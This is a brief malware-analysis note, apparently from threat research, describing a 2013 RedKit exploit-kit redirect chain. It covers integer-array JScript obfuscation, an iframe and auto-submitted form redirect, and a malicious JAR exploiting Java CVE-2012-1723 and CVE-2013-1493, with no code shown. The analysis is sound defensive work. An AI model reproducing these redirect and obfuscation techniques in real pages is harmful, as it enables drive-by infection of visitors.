NOTE: Information is based on a RedKit samples seen on 2013-06-12
Samples of redirect chain:
"First thing first"
The redirect page on the first host in the chain has JScript that builds the request to the second host in the chain from an array of integers.
The script's logic is quite simple:
- add '23' to every integer in the array
- build a string by converting integers array into characters
- evaluate the resulting string
"Second thing second"
The redirect page on the second host in the chain is rather simple
<iframe> with 'onLoad' action calls 'go()' function after 99 milliseconds delay. The function creates a simple HTML document with a <form> and submits it. The action on the <form> is to redirect the browser to a RedKit landing page. There is a <script> that will also direct the browser to the landing page after 3333 milliseconds - safety net??.
"Last thing last"
In the previous instances, a malicious JAR file targeting 'CVE-2012-1723' would be served for GET requests with Java 6 strings in the User-Agent field, but in this instance the JAR file is armed with 'CVE-2013-1493'. Either the server level check for Java version is no more or the previous exploit has been replaced with the new one - time will tell.